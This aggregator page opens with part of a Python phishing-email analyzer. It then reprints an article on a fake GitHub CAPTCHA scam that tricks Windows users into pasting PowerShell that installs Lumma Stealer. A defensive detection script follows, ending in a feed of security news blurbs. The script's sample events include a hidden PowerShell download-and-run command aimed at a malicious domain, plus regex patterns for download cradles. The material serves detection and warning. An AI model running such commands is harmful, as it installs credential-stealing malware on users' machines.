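    if reply_to and domain_of(reply_to) != domain_of(actual):
        findings.append(f"reply-to domain {domain_of(reply_to)} differs from sender domain {domain_of(actual)}")

    # 3. Body text versus images, and what is attached.
    words, images, attachments = 0, 0, []
    for part in msg.walk():
        ctype = part.get_content_type()
        if part.get_content_disposition() == "attachment":
            attachments.append((part.get_filename(), ctype))
        elif ctype in ("text/plain", "text/html"):
            text = part.get_content()
            if ctype == "text/html":
                text = TAG_RE.sub(" ", text)
            words += len(text.split())
        elif ctype.startswith("image/"):
            images += 1
    if images and words < MIN_BODY_WORDS:
        findings.append(f"body is image-based ({images} image(s), {words} words of text)")
    if any(ctype == "application/pdf" for _, ctype in attachments):
        findings.append("PDF attachment in place of a link: inspect embedded images and QR codes")
    return findings


if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_RAW), ("benign", BENIGN_RAW)):
        print(label, analyze(raw) or ["no findings"])
```

None of these findings is conclusive on its own (marketing platforms legitimately send on behalf of customers, and newsletters are often image-heavy), which is why the analyzer reports each trait separately and leaves the scoring to the gateway policy that consumes it.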


 A Little Sunshine

Many GitHub users this week received a novel phishing email warning of critical security holes in their code. Those who clicked the link for details were asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware. While it's unlikely that many programmers fell for this scam, it's notable because less targeted versions of it are likely to be far more successful against the average Windows user.

A reader named Chris shared an email he received this week that spoofed GitHub's security team and warned: "Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue."

Visiting that link generates a web page that asks the visitor to "Verify You Are Human" by solving an unusual CAPTCHA. This malware attack pretends to be a CAPTCHA intended to separate humans from bots. Clicking the "I'm not a robot" button generates a pop-up message asking the user to take three sequential steps to prove their humanity, and the page silently places a PowerShell command on the system clipboard.

Step 1 involves simultaneously pressing the Windows key and the letter "R," which opens the Windows "Run" prompt, a box that will execute any specified program already installed on the system. Step 2 asks the user to press "Control" and the letter "V" at the same time, which pastes the malicious command from the clipboard into that box. Step 3, pressing "Enter," causes Windows to launch that PowerShell command, which then fetches and executes a malicious file from github-scanner[.]com called "l6e.exe."

PowerShell is a powerful, cross-platform automation tool built into Windows that is designed to make it simpler for administrators to automate tasks on a PC or across multiple computers on the same network. According to an analysis at the malware scanning service Virustotal.com, the malicious file downloaded by the pasted text is Lumma Stealer, which is designed to snarf any credentials stored on the victim's PC.
This phishing campaign may not have fooled many programmers, who no doubt natively understand that pressing the Windows and "R" keys will open up a "Run" prompt, or that Ctrl-V will dump the contents of the clipboard. But I bet the same approach would work just fine to trick some of my less tech-savvy friends and relatives into running malware on their PCs. I'd also bet none of these people have ever heard of PowerShell, let alone had occasion to intentionally launch a PowerShell terminal.

Given those realities, it would be nice if there were a simple way to disable or at least heavily restrict PowerShell for normal end users, for whom it could become more of a liability. However, Microsoft strongly advises against removing PowerShell, because some core system processes and tasks may not function properly without it. What's more, doing so requires tinkering with sensitive settings in the Windows registry, which can be a dicey undertaking even for the learned. In managed environments, application-control policies (AppLocker or Windows Defender Application Control) and PowerShell's Constrained Language Mode are the supported ways to limit what a standard user's PowerShell can run; a home PC has no comparable one-click switch.

Still, it wouldn't hurt to share this article with the Windows users in your life who fit the less-savvy profile, because this particular scam has a great deal of room for growth and creativity.
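What a defender can do, short of removing PowerShell, is watch for the shape of the attack in process-creation telemetry: PowerShell started by explorer.exe (a Run-dialog launch), with a command line that hides its window and downloads or decodes something to execute. The following is an added example, not code from the original post: a scoring rule over constructed event records laid out with the field names a Sysmon Event ID 1 or Windows 4688 record carries. The indicator list, the two-hit threshold and the sample command lines are assumptions to be tuned against a real environment.

```python
import re

# Constructed process-creation events (not real logs). Field names follow
# Sysmon Event ID 1 / Windows 4688 conventions; values are invented.
SAMPLE_EVENTS = [
    {   # Run-dialog launch of a hidden PowerShell that downloads and runs an executable
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -w hidden -c "iwr https://github-scanner[.]com/l6e.exe -OutFile $env:TEMP\l6e.exe; Start-Process $env:TEMP\l6e.exe"',
        "User": "CORP\\jdoe",
    },
    {   # Same user running a local script from the Run dialog: benign
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\Users\jdoe\scripts\backup.ps1",
        "User": "CORP\\jdoe",
    },
    {   # Admin fetching a tool from an interactive cmd.exe session: not a Run-dialog launch
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -c iwr https://intranet.example/tools/agent.msi -OutFile agent.msi",
        "User": "CORP\\admin",
    },
    {   # Run-dialog launch of PowerShell 7 with a hidden window and an encoded command
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": r"pwsh -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
        "User": "CORP\\asmith",
    },
]

# Each indicator is one trait of a download-and-execute one-liner. Order matters
# only for the readability of the reported hit list.
INDICATORS = {
    "download cradle": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer|curl|wget)\b", re.I),
    "in-memory execution": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote URL": re.compile(r"https?://", re.I),
}
SHELLS = ("powershell.exe", "pwsh.exe")


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev):
    """Return the indicator names matched, or [] if this is not a Run-dialog PowerShell launch.

    The parent check is the Run-dialog tell: a user pasting into Win+R gets
    explorer.exe as the parent, whereas a terminal or script host does not.
    """
    if basename(ev["ParentImage"]) != "explorer.exe" or basename(ev["Image"]) not in SHELLS:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(ev["CommandLine"])]


def find_clickfix_candidates(events, min_hits=2):
    """Return (user, hits) for events matching at least min_hits indicators."""
    candidates = []
    for ev in events:
        hits = score_event(ev)
        if len(hits) >= min_hits:
            candidates.append((ev["User"], hits))
    return candidates


if __name__ == "__main__":
    for user, hits in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"ALERT possible paste-to-Run malware launch by {user}: {', '.join(hits)}")
```

Requiring two indicators keeps a plain `-File script.ps1` from the Run box quiet while still catching both the cleartext cradle and the hidden-window-plus-encoded variant; if the environment never legitimately launches PowerShell from the Run dialog at all, the threshold can drop to one.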

 Computer, Internet Security

Snowflake, a cloud-based data warehousing platform, has implemented default multifactor authentication and a minimum 14-character password requirement following cyberattacks in June affecting multiple customers.

 Malware and Vulnerabilities

Microsoft has confirmed CVE-2024-37985 as a zero-day bug in Windows with a CVSS score of 5.9. It is a Windows Kernel information disclosure vulnerability, allowing attackers to access heap memory from a privileged process on a vulnerable server.

 Feed

Red Hat Security Advisory 2024-6843-03 - An update for pcp is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include a heap corruption vulnerability.

 Feed

Red Hat Security Advisory 2024-6842-03 - An update for pcp is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include a heap corruption vulnerability.

 Feed

Red Hat Security Advisory 2024-6755-03 - Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.2 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.

 Feed

Red Hat Security Advisory 2024-6753-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include double free and out of bounds read vulnerabilities.

 Feed

Ubuntu Security Notice 7025-1 - It was discovered that LibreOffice would incorrectly handle digital signature verification after repairing a corrupted document. A remote attacker could possibly use this issue to forge valid signatures.

 Feed

GitLab has released patches to address a critical flaw impacting Community Edition (CE) and Enterprise Edition (EE) that could result in an authentication bypass. The vulnerability is rooted in the ruby-saml library (CVE-2024-45409, CVSS score: 10.0), which could allow an attacker to log in as an arbitrary user within the vulnerable system. It was addressed by the maintainers last week. The

 Feed

Cybersecurity in healthcare has never been more urgent. As the most vulnerable industry and largest target for cybercriminals, healthcare is facing an increasing wave of cyberattacks. When a hospital's systems are held hostage by ransomware, it’s not just data at risk — it’s the care of patients who depend on life-saving treatments. Imagine an attack that forces emergency care to halt, surgeries

 Feed

Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S. The tech giant's threat intelligence team is tracking the activity under the name Vanilla Tempest (formerly DEV-0832). "Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494,

 Feed

Until just a couple of years ago, only a handful of IAM pros knew what service accounts are. In the last years, these silent Non-Human-Identities (NHI) accounts have become one of the most targeted and compromised attack surfaces. Assessments report that compromised service accounts play a key role in lateral movement in over 70% of ransomware attacks. However, there’s an alarming disproportion

 Feed

Threat actors have been observed targeting the construction sector by infiltrating the FOUNDATION Accounting Software, according to new findings from Huntress. "Attackers have been observed brute-forcing the software at scale, and gaining access simply by using the product’s default credentials," the cybersecurity company said. Targets of the emerging threat include plumbing, HVAC (heating,

 Feed

A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor. "Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country," Kaspersky said in a new analysis. "It's likely that the attackers are testing the

 Feed

The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system. "The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim's assets, during which the threat actor uploaded a malicious script," Group-IB researchers Vito Alfano and Nam Le

 Data loss

Transport for London (TfL) suffers a cybersecurity incident and tells its 30,000 staff they will all have to have their identities verified... in person. Who might have been behind the attack and why? Meanwhile, Donald Trump's curious relationship with cryptocurrency is explored. All this and Demi Moore is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

 Beware

Source: www.databreachtoday.com – Rashmi Ramesh (rashmiramesh_), September 18, 2024. Topics: Artificial Intelligence & Machine Learning; Next-Generation Technologies & Secure Development. Crashing Markets, Slower Innovation, But More Sustainable AI Development. If the bubble isn't popping already, it'll pop soon, say many investors and close observers of the artificial intelligence […] The post "Beware the Great AI Bubble Popping" first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Michael Novinson (MichaelNovinson), September 18, 2024. Topics: Governance & Risk Management; Network Detection & Response; SASE. Acquisition Set to Boost SASE Protection, Network Connectivity for Swiss Businesses. Swiss Post plans to purchase secure access service edge stalwart Open Systems to enhance secure communications and data protection […] The post "Swiss Post to Strengthen Cybersecurity With Open Systems Buy" first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 California

Source: www.databreachtoday.com – Rashmi Ramesh (rashmiramesh_), September 18, 2024. Topics: Artificial Intelligence & Machine Learning; Next-Generation Technologies & Secure Development; Standards, Regulations & Compliance. Laws Seek Removal of Deceptive Content, Labeling of Less Malicious Content. California enacted regulation […] The post "California Enacts Laws to Combat Election, Media Deepfakes" first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 Australian

Source: www.databreachtoday.com – Akshaya Asokan (asokan_akshaya), September 18, 2024. Topics: Cybercrime; Encryption & Key Management; Fraud Management & Cybercrime. International Law Enforcement Dismantles End-to-End Encrypted Messaging Service. Alleged Ghost administrator Jay Je Yoon Jung being led away by an Australian Federal Police officer (image: Australian Federal Police). An international […] The post "Australian Police Arrest Alleged Head of Ghost Encrypted App" first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 attacks

Source: www.databreachtoday.com – Andrew Koh, September 18, 2024 (20-minute interview). Topics: 3rd Party Risk Management; Governance & Risk Management; Healthcare. Regulatory Attorney Rachel Rose on Top Concerns for Healthcare Security. Recent mega data breaches involving third-party vendors, such as the Change Healthcare cyberattack […] The post "How Mega Attacks Are Spotlighting Critical 3rd-Party Risks" first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.databreachtoday.com – Brandy Harris, September 18, 2024. Topics: Leadership & Executive Communication; Recruitment & Reskilling Strategy; Training & Security Leadership. Tell Interviewers How You Respond to Incidents and Solve Problems. Job interviews can be particularly challenging for roles in technical professions such as cybersecurity. Many […] The post "Use the STAR Method for Your Cybersecurity Job Interview" first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Information S

Aligning Cyber with Organisational Priorities. Cybersecurity is critical, but business profitability is essential for survival. Understanding risk tolerance and operational insights is fundamental, as is engaging business leaders in discussions about goals and growth. Conducting a SWOT analysis can guide cyber strategy, while comprehending financial drivers and the impact of cyber incidents fosters stronger relationships […] The post "Crack the Code" first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Cybersecurity

Members-only content: a free CISO2CISO.COM membership is required to read it. The post "CISO Reporting Landscape 2024" first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Cybersecurity

FIRST 100 DAYS. We propose a series of recommendations from hard lessons learned and a best-practice approach to: According to a study from the Enterprise Strategy Group and the Information Systems Security Association, a lack of alignment between the CISO role and the business, the C-suite and the Board of Directors can contribute to […] The post "CISO PLAY BOOK" first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Cybersecurity

Members-only content: a free CISO2CISO.COM membership is required to read it. The post "Reporting Cyber Risk to Boards" first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - Cybersecurity Tools - IAM - Ide

The Cybersecurity and Infrastructure Security Agency (CISA) has repeatedly identified virtual private network (VPN) solutions as the entry point in recent high-profile incidents involving both cybercriminals and nation-state actors. CISA has catalogued over 22 Known Exploited Vulnerabilities (KEVs) related to VPN compromise, each leading to broad access to victim networks. These incidents and associated […] The post "MODERN APPROACHES TO NETWORK ACCESS SECURITY" first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - Cybersecurity Architecture - IA

Members-only content: a free CISO2CISO.COM membership is required to read it. The post "CIOB Artificial Intelligence (AI) Playbook 2024" first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Information S

In the current landscape, technological advances, interconnectivity and digital communication are essential factors for society, to such an extent that they significantly drive its dynamics. In a context dominated by technology and digital communication, innovation therefore emerges as a fundamental pillar, in the sense that it represents […] The post "ESTADO DE LA CIBERSEGURIDAD EN COSTA RICA 2023" (State of Cybersecurity in Costa Rica 2023) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Risk & Compli

Members-only content: a free CISO2CISO.COM membership is required to read it. The post "Nuevas normativas de 2024 de ciberseguridad para vehículos" (New 2024 cybersecurity regulations for vehicles) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 0 - CT - CISO Strategics - Cybersecurity

A guide for civil society organizations that want to start a cybersecurity plan. This manual was written with a simple objective: to help your civil society organization develop a cybersecurity plan that is understandable and applicable. As the world moves ever more online, the […] The post "Manual de Ciberseguridad" (Cybersecurity Manual) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

Aggregator history: Thursday, September 19, 2024